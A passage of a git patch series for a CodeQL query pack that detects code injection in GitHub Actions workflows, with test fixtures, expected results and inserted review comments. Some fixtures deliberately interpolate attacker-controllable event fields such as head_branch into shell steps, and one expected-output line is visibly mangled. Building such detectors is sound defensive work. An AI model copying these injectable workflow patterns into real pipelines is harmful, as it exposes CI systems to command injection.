= trimQuotes(assignment.splitAt("::", 1)) ) } diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 639fbd4c530f..aa2ccdcfe9c0 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -428,8 +428,6 @@ testNormalizeExpr | github.event.pull_request.user['login'] | github.event.pull_request.user.login | | github.event.pull_request['user']['login'] | github.event.pull_request.user.login | writeToGitHubEnv -| "sha1 | $(> $GITHUB_OUTPUT", "echo 'sha2=$(> $GITHUB_OUTPUT", "echo sha3=$(> $GITHUB_OUTPUT", + "echo sha4=$(> \"$GITHUB_OUTPUT\"", + "echo sha5=$(> ${GITHUB_OUTPUT}", + "echo sha6=$(> \"${GITHUB_OUTPUT}\"", ] and Utils::extractAssignment(t, "OUTPUT", key, value) ) diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml index b9fa152e49ab..153ebc5b733e 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml @@ -5,7 +5,7 @@ jobs: runs-on: ubuntu-latest outputs: - job_output: ${{ steps.step2.outputs.test }} + job_output: ${{ steps.step5.outputs.MSG5 }} steps: - uses: actions/checkout@v4 @@ -24,7 +24,19 @@ jobs: - id: step2 env: MSG: ${{steps.step1.outputs.MSG}} - run: echo "test=$MSG" >> "$GITHUB_OUTPUT" + run: echo "MSG2=$MSG" >> "$GITHUB_OUTPUT" + - id: step3 + env: + MSG2: ${{steps.step2.outputs.MSG2}} + run: echo "MSG3=$MSG2" >> "${GITHUB_OUTPUT}" + - id: step4 + env: + MSG3: ${{steps.step3.outputs.MSG3}} + run: echo "MSG4=$MSG3" >> ${GITHUB_OUTPUT} + - id: step5 + env: + MSG4: ${{steps.step4.outputs.MSG4}} + run: echo "MSG5=$MSG4" >> $GITHUB_OUTPUT job2: runs-on: ubuntu-latest diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index d2e188ead67f..1a12b8e72771 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
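Review bot: `splitAt("=", 1)` in the rewritten `extractAssignment` keeps only the text between the first and second `=`, so a value that itself contains `=` (`echo "URL=https://x/?a=b" >> $GITHUB_ENV`, base64 padding) is truncated and a tainted expression placed after that point never reaches the sinks' `indexOf` check; splitting on the first `=` only, e.g. `key = trimQuotes(assignment.regexpCapture("([^=]+)=(.*)", 1)) and value = trimQuotes(assignment.regexpCapture("([^=]+)=(.*)", 2))`, keeps the whole value (the `::set-` branch truncates the same way for values containing `::`). The `Write-Output` alternative can only ever match Bash-style `$GITHUB_ENV`/`${GITHUB_ENV}`; PowerShell steps redirect to `$env:GITHUB_ENV`, so `\\$(\\{|env:)?GITHUB_` would make that branch reachable. The `.regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "")` chain on the `::set-` capture is now redundant, since both halves already go through `trimQuotes`, which also handles single quotes. Multi-line heredoc assignments (`FOO<<EOF`) are out of reach of a per-line predicate; a QLDoc sentence on `extractAssignment` saying so would tell query authors where detection coverage ends.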
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
@@ -54,14 +54,20 @@ edges | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | +| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | +| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | +| 
.github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | +| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | +| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | nodes | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | 
@@ -198,14 +204,20 @@ nodes | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | +| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | +| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | +| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | +| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:36:9:41:2 | Run Step: 
step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | +| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index bc1fd8709507..f4df15ae3445 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -54,14 +54,20 @@ edges | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | +| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | +| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | +| 
.github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | +| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | +| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | nodes | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | 
@@ -198,14 +204,20 @@ nodes | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | +| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | +| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | +| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | +| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:36:9:41:2 | Run Step: 
step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | +| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | 
@@ -297,7 +309,7 @@ subpaths | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | +| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | From 5968da87bb807a187099fd103c2311e8ac66f9af Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 18:53:39 +0200 Subject: [PATCH 156/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f775d7511647..c1d32a1f817d 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.8 +version: 0.0.9 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 2db4c237da3f..134b0db2b171 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.8 +version: 0.0.9 groups: - actions - queries From 8d2b8be133ff0f088d70baab96cb0ba8ad5762aa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Apr 2024 22:32:49 +0200 Subject: [PATCH 157/707] Add github.event as a source --- .../codeql/actions/dataflow/FlowSources.qll | 8 +++++++ .../CWE-094/.github/workflows/simple3.yml | 23 +++++++++++++++++++ .../Security/CWE-094/CodeInjection.expected | 2 ++ .../CWE-094/PrivilegedCodeInjection.expected | 4 ++++ 4 files changed, 37 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index c0e0e759120f..e07b9f76762c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
@@ -22,6 +22,13 @@ abstract class RemoteFlowSource extends SourceNode {
 override string getThreatModel() { result = "remote" }
 }
+bindingset[context]
+private predicate isExternalUserControlled(string context) {
+ exists(string reg | reg = "github\\.event" |
+ Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg))
+ )
+}
+
 bindingset[context]
 private predicate isExternalUserControlledIssue(string context) {
 exists(string reg | reg = ["github\\.event\\.issue\\.title", "github\\.event\\.issue\\.body"] |
@@ -123,6 +130,7 @@ private predicate isExternalUserControlledWorkflowRun(string context) {
 private class EventSource extends RemoteFlowSource {
 EventSource() {
 exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() |
+ isExternalUserControlled(context) or
 isExternalUserControlledIssue(context) or
 isExternalUserControlledPullRequest(context) or
 isExternalUserControlledReview(context) or
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml
new file mode 100644
index 000000000000..be1559d47110
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml
@@ -0,0 +1,23 @@
+on:
+ workflow_run:
+ workflows:
+ - 'prev'
+ types:
+ - completed
+
+permissions:
+ actions: read
+ checks: read
+ contents: read
+
+jobs:
+ echo_trigger:
+ name: Report changes
+ runs-on: ubuntu-latest
+ steps:
+ - name: Echo trigger
+ run: |
+ echo "head branch: ${{ github.event.workflow_run.head_branch }}"
+ cat << EOF
+ ${{ toJSON(github.event) }}
+ EOF
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected
index 1a12b8e72771..a300f4dd11ea 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected
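Review bot: The pattern `github\\.event` in the new `isExternalUserControlled` predicate is a prefix of every pattern in the existing `isExternalUserControlled*` predicates, so once it is or-ed into `EventSource` every `github.event` expression becomes a remote flow source and the narrower predicates no longer discriminate anything; depending on what `Utils::wrapRegexp` anchors (not visible here), fields set by the repository rather than the triggering actor — `github.event.repository.*`, for instance — will be reported with the same "may be controlled by an external user" message as `head_branch`. Catching `toJSON(github.event)`, as the new simple3.yml fixture does, is worth that, but the over-approximation should be stated where the predicate is defined, e.g. `// Over-approximation: treat every github.event.* field as attacker-controlled so that toJSON(github.event) and unmodelled fields are caught; repository-owned fields will produce false positives.` If precision becomes a problem, a narrower option is to match only `github.event` as a whole (the `toJSON` case) and leave sub-fields to the specific predicates. `EventSource`'s constructor continues past the end of the hunk.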
@@ -200,6 +200,8 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index f4df15ae3445..f025d13b1a9e 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -200,6 +200,8 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | 
@@ -307,6 +309,8 @@ subpaths | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | From 0051914245f5f4e210e6bf06edff609d032ccb46 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:21:59 +0200 Subject: [PATCH 158/707] Add `.cache` to gitignore --- .gitignore | 1 + 1 file changed, 1 insertion(+) 
diff --git a/.gitignore b/.gitignore
index 1127e8f55db1..4ba9d315acc7 100644
--- a/.gitignore
+++ b/.gitignore
@@ -4,3 +4,4 @@ ql/lib/.codeql/
 ql/src/.codeql/
 ql/test/.codeql/
 db/
+.cache
\ No newline at end of file
From a817a22cc7ac10417f6c7cd8c137d0d7139bf87d Mon Sep 17 00:00:00 2001
From: jorgectf
Date: Thu, 11 Apr 2024 11:22:36 +0200
Subject: [PATCH 159/707] Remove redundant import
---
 ql/lib/codeql/actions/dataflow/FlowSources.qll | 1 -
 ql/lib/codeql/actions/dataflow/FlowSteps.qll | 1 -
 2 files changed, 2 deletions(-)
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index c0e0e759120f..8cbca48af0a7 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
@@ -1,7 +1,6 @@
 private import actions
 private import codeql.actions.DataFlow
